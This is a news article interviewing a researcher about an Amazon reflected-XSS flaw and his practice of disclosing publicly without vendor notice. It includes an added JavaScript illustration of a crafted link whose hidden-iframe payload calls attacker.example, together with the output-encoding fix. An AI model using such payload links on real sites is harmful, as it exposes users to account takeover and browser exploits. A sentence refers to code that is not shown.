Amazon patches huge XSS vulnerability that left user data exposed for two days
A serious XSS vulnerability left Amazon customers in "real danger" of having their accounts compromised. The man who made the discovery is Brute Logic, currently the top-ranked researcher on XSSposed.org and a self-described "light-gray computer hacker". We spoke to him about the security issue and about the responsibilities involved in exposing vulnerabilities.
The cross-site scripting vulnerability was discovered on March 21 and was left unpatched for two days. During that time, Brute Logic says, there was a real risk that people "could have their Amazon account compromised or have their computer invaded by means of a browser exploit". He says it is the responsibility of sites to fix problems once they are highlighted by the hacking community.
Brute Logic is not, like some hackers, in the habit of holding sites to ransom when a vulnerability is discovered. At the same time, he and other hackers are not out to do the cleanup work for the likes of Amazon. I asked whether he had informed Amazon of the security issue when he discovered it: "Since they do not pay for that, I just reported it to XSSposed.org and tweeted with a mention".
Google's Project Zero came in for criticism recently after Microsoft complained that the search giant's bug disclosure policy did not allow enough time for vulnerabilities to be patched. This led to Google relaxing its policy slightly, but Brute Logic thinks the approach is correct. "I think Google is just 'not being evil'. I like the way they are doing it: it is not Google's problem," he says.
But what of the Amazon vulnerability? It's all well and good to say that users were at risk, but just what does this mean?
This code can also let me redirect your browser (you will never see it) to another site, controlled by me, that will identify your browser and select an appropriate exploit for it. If this attack succeeds (based mainly on your lack of browser, Java or Adobe updates), I will have total control over your computer.
In order to make these types of attacks happen, all that's needed is for a victim to click on a specially crafted link, and that is not difficult once you have a legitimate link from the Amazon website. A fake email or a social-network share is enough to trick the victim, as that plays on his/her trust in Amazon's reputation.
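To make the mechanism concrete, here is an added illustration of a reflected XSS link of the kind described above. It is not Brute Logic's code and not Amazon's; the search page, the `q` parameter, the host names and the payload are all assumptions chosen for the example. It shows why a legitimate-looking URL on a trusted host is enough: the vulnerable page copies the query string into its HTML, so an invisible iframe pointing at an attacker's server ends up in the response, while the same page with output encoding renders the payload as harmless text.

```javascript
// Added example, not code from the article. The search page, the "q" parameter
// and the host names below are hypothetical stand-ins for a site that reflects
// user input into its HTML.

// Vulnerable renderer: reflects the query parameter straight into the page.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// HTML-encode the five characters that can break out of a text or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: same page, but the reflected value is encoded first.
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// The attacker's crafted link: a URL on the trusted host with the payload in the
// query string. The payload loads an attacker-controlled page in a hidden iframe,
// so the victim never sees the "redirect" to the browser-fingerprinting site.
const payload =
  '<iframe src="https://attacker.example/probe" style="display:none"></iframe>';
const craftedLink = "https://shop.example/search?q=" + encodeURIComponent(payload);

// Simulate what the server does with the link: parse the query parameter back out,
// render the page, and check whether markup the page author never wrote is present.
function reflectsPayload(renderer, link) {
  const q = new URL(link).searchParams.get("q");
  const html = renderer(q);
  return /<iframe\b/i.test(html);
}

function demo() {
  return {
    vulnerable: reflectsPayload(renderSearchVulnerable, craftedLink), // true
    hardened: reflectsPayload(renderSearchSafe, craftedLink),         // false
  };
}

console.log(JSON.stringify(demo()));
```

The hardened version does not try to detect or strip "bad" input; it encodes every reflected value for the HTML context it lands in, which is the fix that closes this class of bug rather than one payload.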
But what risks were people really at?
Amazon customers were in real danger: it is very easy to launch a massive spam campaign pointing to a link that exploits this flaw.
Brute Logic explained to me that the vulnerability was discovered "by chance. I just use a custom scan from Google results".
So what about the responsibility of someone discovering a vulnerability? How does this tie into describing yourself as a light-gray hacker?
The vulnerability itself has no color: what we did with it is what makes us white, black or gray. I am light gray because I don't care about what white hats call "responsible disclosure", in which they report and collaborate with vendor before making the vulnerability public... unless they pay me well for it. But I don't do anything for money; I refuse to go for the dark side of hacking.
Does the responsibility lie with the person discovering a vulnerability to share it with the world, or with the site or service with the problem?
I think this is a site/service problem. We are forcing the websites to be secure and their owners to stay tuned to what is happening in our hacking community. It is their fault for not taking security seriously. We do.